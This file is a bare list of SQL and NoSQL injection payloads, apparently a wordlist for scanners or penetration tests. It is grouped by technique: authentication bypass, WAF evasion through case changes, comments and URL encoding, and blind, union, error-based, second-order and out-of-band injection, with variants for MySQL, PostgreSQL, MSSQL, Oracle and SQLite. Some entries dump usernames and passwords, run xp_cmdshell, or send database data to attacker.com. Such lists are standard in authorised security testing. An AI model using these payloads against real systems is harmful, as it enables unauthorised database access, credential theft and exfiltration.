' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #
' OR 1=1--
') OR ('1'='1
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION ALL SELECT NULL--
' AND '1'='1
' AND '1'='2
'; WAITFOR DELAY '0:0:5'--
'; SELECT SLEEP(5)--
' AND 1=CONVERT(int, (SELECT @@version))--
"
'
';
";
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' UNION SELECT username, password FROM users--

# ========================================
# ENHANCED: Authentication Bypass Payloads
# ========================================
' or 1=1--
' or '1'='1
' or ''='
admin'--
admin'/*
'or 1=1 or ''='
' OR 'x'='x
') OR ('x'='x
'OR 1=1--
" or ""="
" or 1=1--
' OR 'a'='a
' OR 'b'='b' --

# ========================================
# WAF Bypass - Case Variations
# ========================================
' oR '1'='1
' Or '1'='1
' OR '1'='1
' UNION SELECT null--
' UnIoN SeLeCt null--
' uNiOn aLl sElEcT null--

# ========================================
# WAF Bypass - Comment Variations
# ========================================
'/**/OR/**/1=1--
'/*!50000OR*/1=1--
'||'1
'&&'1'='1
'+OR+'1'='1
'+AND+'1'='1

# ========================================
# WAF Bypass - Encoding
# ========================================
%27%20OR%20%271%27%3D%271
%27%20OR%20%271%27%3D%271%27--
%2527%2520OR%2520%25271%2527%253D%25271
%252527%252520OR%252520%2525271%2525273D%25252271

# ========================================
# Time-Based Blind SQL Injection
# ========================================
' AND SLEEP(5)--
' AND SLEEP(5) AND '1'='1
'; WAITFOR DELAY '0:0:5'--
' AND BENCHMARK(10000000,SHA1('test'))--
'; SELECT pg_sleep(5)--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
1;WAITFOR DELAY '0:0:5'--
1';WAITFOR DELAY '0:0:5'--

# ========================================
# Boolean-Based Blind SQL Injection
# ========================================
' AND 1=1--
' AND 1=2--
' AND 'a'='a
' AND 'a'='b
' AND SUBSTRING(@@version,1,1)='5'--
' AND (SELECT COUNT(*) FROM users)>0--

# ========================================
# UNION-Based SQL Injection
# ========================================
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,4,5--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,concat(username,0x3a,password),NULL FROM users--
' UNION ALL SELECT NULL,NULL,NULL--
-1 UNION SELECT 1,2,3--
1' UNION SELECT NULL,table_name FROM information_schema.tables--

# ========================================
# Error-Based SQL Injection
# ========================================
' AND extractvalue(1,concat(0x7e,version()))--
' AND updatexml(1,concat(0x7e,version()),1)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND GTID_SUBSET(CONCAT(0x7e,version()),1)--

# ========================================
# NoSQL Injection
# ========================================
{'$gt': ''}
{'$ne': ''}
{'$regex': '.*'}
' || '1'=='1
'; return true; var a='
" || "1"=="1

# ========================================
# Second-Order SQL Injection
# ========================================
admin'-- 
test'||(SELECT''FROM users WHERE username='admin')--
INSERT INTO users VALUES ('admin'--')

# ========================================
# Out-of-Band SQL Injection
# ========================================
'; EXEC master..xp_dirtree '\\\\attacker.com\\share'--
'; SELECT load_file(concat('\\\\\\\\',version(),'.attacker.com\\\\a'))--

# ========================================
# Database Specific - MySQL
# ========================================
' OR 1=1#
' OR '1'='1'#
'/*!50000UNION*/SELECT 1--
'/*!50000AND*/ 1=1--

# ========================================
# Database Specific - PostgreSQL
# ========================================
' OR 1=1;--
'; SELECT version();--
' || pg_sleep(5)--
'; COPY users TO '/tmp/out';--

# ========================================
# Database Specific - MSSQL
# ========================================
' OR 1=1;--
'; EXEC xp_cmdshell('whoami');--
' AND 1=CONVERT(int,@@version)--
'; DECLARE @a VARCHAR(8000);SELECT @a=version();--

# ========================================
# Database Specific - Oracle
# ========================================
' OR 1=1--
'||UTL_HTTP.request('http://attacker.com/'||version)||'
' AND 1=utl_inaddr.get_host_address((SELECT user FROM dual))--

# ========================================
# Database Specific - SQLite
# ========================================
' OR 1=1--
' UNION SELECT sql FROM sqlite_master--
' AND 1=randomblob(100000000)--
